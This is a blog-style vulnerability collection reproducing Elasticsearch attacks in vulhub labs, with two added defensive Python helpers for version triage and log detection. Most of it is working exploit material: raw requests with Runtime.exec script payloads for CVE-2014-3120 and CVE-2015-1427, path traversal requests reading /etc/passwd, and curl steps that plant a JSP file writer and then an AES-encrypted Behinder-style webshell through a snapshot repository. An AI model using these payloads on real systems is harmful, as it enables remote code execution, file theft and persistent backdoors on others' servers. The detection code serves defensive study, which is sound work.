Elasticsearch Vulnerability Collection

Category: Security Articles


All of the reproduction environments in this article come from vulhub. The reason for reproducing these is that Elasticsearch is encountered fairly often in attack-and-defense exercises. The reproduction notes below are kept brief, and the images copied out of Word are somewhat blurry.


1. Unauthorized access exposes sensitive information

The following endpoints can be read without authentication:

/_cat
/_cat/indices
/_plugin/sql/
/_nodes
/_search
/_search?pretty
/_status
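An unauthenticated /_nodes reply hands out each node's version and effective settings, which is exactly what a defender needs to decide which of the issues reproduced in the later sections apply to a cluster. The following triage helper is an added example, not code from the original post or from vulhub; the affected-version ranges are taken from the public advisories for the CVEs covered below, and the node-info reply is a constructed sample.

```python
"""Added example (not from the original post): triage an Elasticsearch
node-info reply against the issues this write-up reproduces. Version
ranges come from the public advisories; the reply is a constructed sample."""
import json

# Constructed sample shaped like the relevant parts of a /_nodes reply.
SAMPLE_NODES_RESPONSE = json.dumps({
    "cluster_name": "elasticsearch",
    "nodes": {
        "node-a": {"version": "1.1.1", "settings": {}},
        "node-b": {"version": "1.4.2", "settings": {}},
        "node-c": {"version": "1.7.0", "settings": {}},
    },
})

# (CVE, first affected version inclusive, first fixed version exclusive)
AFFECTED_RANGES = [
    ("CVE-2014-3120", (0, 0, 0), (1, 2, 0)),  # MVEL dynamic scripting RCE
    ("CVE-2015-1427", (1, 3, 0), (1, 3, 8)),  # Groovy sandbox bypass RCE
    ("CVE-2015-1427", (1, 4, 0), (1, 4, 3)),
    ("CVE-2015-3337", (0, 0, 0), (1, 4, 5)),  # site-plugin path traversal
    ("CVE-2015-3337", (1, 5, 0), (1, 5, 2)),
    ("CVE-2015-5531", (0, 0, 0), (1, 6, 1)),  # snapshot path traversal
]


def parse_version(text):
    """'1.4.2' -> (1, 4, 2); a pre-release suffix such as '-beta1' is ignored."""
    return tuple(int(p) for p in text.split("-")[0].split(".")[:3])


def triage_node(version_text, settings):
    """Sorted findings for one node: CVEs from this page that cover its version,
    plus a flag when dynamic scripting was re-enabled on a release that
    disables it by default (settings assumed nested as in a 1.x /_nodes reply)."""
    ver = parse_version(version_text)
    found = {cve for cve, lo, hi in AFFECTED_RANGES if lo <= ver < hi}
    disable_dynamic = str(settings.get("script", {}).get("disable_dynamic", "true"))
    if ver >= (1, 2, 0) and disable_dynamic.lower() == "false":
        found.add("dynamic-scripting-enabled")
    return sorted(found)


def triage_cluster(nodes_json):
    """Map node id -> findings for every node in a /_nodes reply."""
    data = json.loads(nodes_json)
    return {nid: triage_node(n["version"], n.get("settings", {}))
            for nid, n in data["nodes"].items()}
```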


2. CVE-2014-3120 remote code execution

    Visit the environment


    Submit the request below to create a document

POST /website/blog/ HTTP/1.1
Host: 192.168.100.180:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

{ "name": "test"}


    Once the document has been created, code can be executed

POST /_search?pretty HTTP/1.1
Host: 192.168.100.180:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 356

{ "size": 1, "query": { "filtered": { "query": { "match_all": { } } } }, "script_fields": { "command": { "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();" } }}


    A reverse shell command needs to be encoded first

http://www.jackson-t.ca/runtime-exec-payloads.html


3. CVE-2015-1427 remote code execution

    Visit the environment


    Send a POST request to create a document

POST /website/blog/ HTTP/1.1
Host: 192.168.100.180:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

{ "name": "test"}


    After the document is created, execute code

POST /_search?pretty HTTP/1.1
Host: 192.168.100.180:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1,"script_fields":{"lupin":{"lang":"groovy","script":"java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}


Encode the command to get a reverse shell


4. Directory traversal CVE-2015-3337

    Visit the environment


/_cat/plugins: lists all installed plugins


The request has to be sent with Burp; it cannot be verified from a browser

GET /_plugin/head/../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.100.180:9200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


5. Directory traversal CVE-2015-5531

    Visit the environment


Use a PUT request to create a repository

PUT /_snapshot/test HTTP/1.1
Host: 192.168.100.180:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 108

{ "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test" }}


Create a snapshot the same way

PUT /_snapshot/test2 HTTP/1.1
Host: 192.168.100.180:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

{ "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" }}


Visit

http://192.168.100.180:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: 192.168.100.180:9200
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


The response needs decoding: in the browser console, enter String.fromCharCode( ... ) with those numbers as the arguments


6. Elasticsearch webshell write vulnerability

    Visit the environment


Writing a webshell requires that you already know the web root path

First, create a malicious index document

Run in a terminal

curl -XPOST http://192.168.100.180:9200/yz.jsp/yz.jsp/1 -d '{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}'


Then create a malicious repository

curl -XPUT 'http://192.168.100.180:9200/_snapshot/yz.jsp' -d '{ "type":"fs", "settings": { "location":"/usr/local/tomcat/webapps/wwwroot/", "compress": false }}'


Verify the repository and create the snapshot

curl -XPUT "http://192.168.100.180:9200/_snapshot/yz.jsp/yz.jsp" -d '{     "indices": "yz.jsp",     "ignore_unavailable": "true",     "include_global_state": false}'


Visit port 8080 to check whether the file is reachable

http://192.168.100.180:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp


This shell writes an arbitrary string into the file test.jsp under wwwroot; the parameter is f

http://192.168.100.180:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%3e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%3e%3c%25if(request.getParameter(%22pass%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%3e

The webshell must be URL-encoded when written, otherwise it will not succeed

http://192.168.100.180:8080/wwwroot/test.jsp


You can see that it has been written; connect to it with Behinder (冰蝎)
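Every step reproduced in this write-up leaves a distinctive request on the wire: the traversal paths of sections 4 and 5, the script_fields bodies of sections 2 and 3, and the snapshot repository pointed at a web root in section 6. The classifier below is an added example, not code from the original post or from vulhub; it runs over a constructed request log (the event format, the trusted-host list, the assumed path.repo prefix and the client address are all assumptions) and flags those shapes.

```python
"""Added example (not from the original post): flag, in a request log, the
request patterns this write-up reproduces. Events are dicts with src, method,
path and an optional body, as a WAF or proxy in front of port 9200 might
record them; the format, the client address and the events are constructed."""
import json
from urllib.parse import unquote

ALLOWED_REPO_PREFIX = "/usr/share/elasticsearch/repo/"  # assumed path.repo
TRUSTED_SOURCES = {"10.0.0.5"}                           # assumed admin hosts
ADMIN_PREFIXES = ("/_cat", "/_nodes", "/_plugin", "/_status", "/_snapshot")

SAMPLE_EVENTS = [  # constructed, mirroring the requests in this write-up
    {"src": "10.0.0.5", "method": "GET", "path": "/_cat/indices"},
    {"src": "192.168.100.1", "method": "GET", "path": "/_nodes"},
    {"src": "192.168.100.1", "method": "POST", "path": "/_search?pretty",
     "body": '{"size":1,"script_fields":{"x":{"lang":"groovy","script":'
             '"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"id\\")"}}}'},
    {"src": "192.168.100.1", "method": "GET", "path": "/_plugin/head/../../../../etc/passwd"},
    {"src": "192.168.100.1", "method": "GET", "path": "/_snapshot/test/backdata%2f..%2f..%2fetc%2fpasswd"},
    {"src": "192.168.100.1", "method": "PUT", "path": "/_snapshot/yz.jsp",
     "body": '{"type":"fs","settings":{"location":"/usr/local/tomcat/webapps/wwwroot/"}}'},
]


def decode_path(path):
    # Percent-decode until stable so %2f..%2f and double-encoded forms are seen.
    prev, cur = None, path
    while prev != cur:
        prev, cur = cur, unquote(cur)
    return cur


def classify(event):
    """Findings for one event; an empty list means nothing matched."""
    findings = []
    path = decode_path(event["path"].split("?", 1)[0])
    body = event.get("body", "")
    if "/../" in path or path.endswith("/.."):
        findings.append("path-traversal")  # CVE-2015-3337 / CVE-2015-5531 shape
    if "script" in body and any(t in body for t in ("Runtime", "exec(", "forName(")):
        findings.append("script-rce-attempt")  # CVE-2014-3120 / CVE-2015-1427 shape
    if event["method"] == "PUT" and path.startswith("/_snapshot/") and body:
        try:
            location = json.loads(body).get("settings", {}).get("location", "")
        except ValueError:
            location = ""
        if location and not location.startswith(ALLOWED_REPO_PREFIX):
            findings.append("repo-outside-path.repo")  # snapshot-into-webroot shape
    if path.startswith(ADMIN_PREFIXES) and event["src"] not in TRUSTED_SOURCES:
        findings.append("admin-api-from-untrusted-source")
    return findings


def scan(events):
    """(src, path, findings) for every event that triggers at least one finding."""
    return [(e["src"], e["path"], classify(e)) for e in events if classify(e)]
```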




This article was first published on the WeChat official account (MrLee 小师父): Elasticsearch漏洞集合
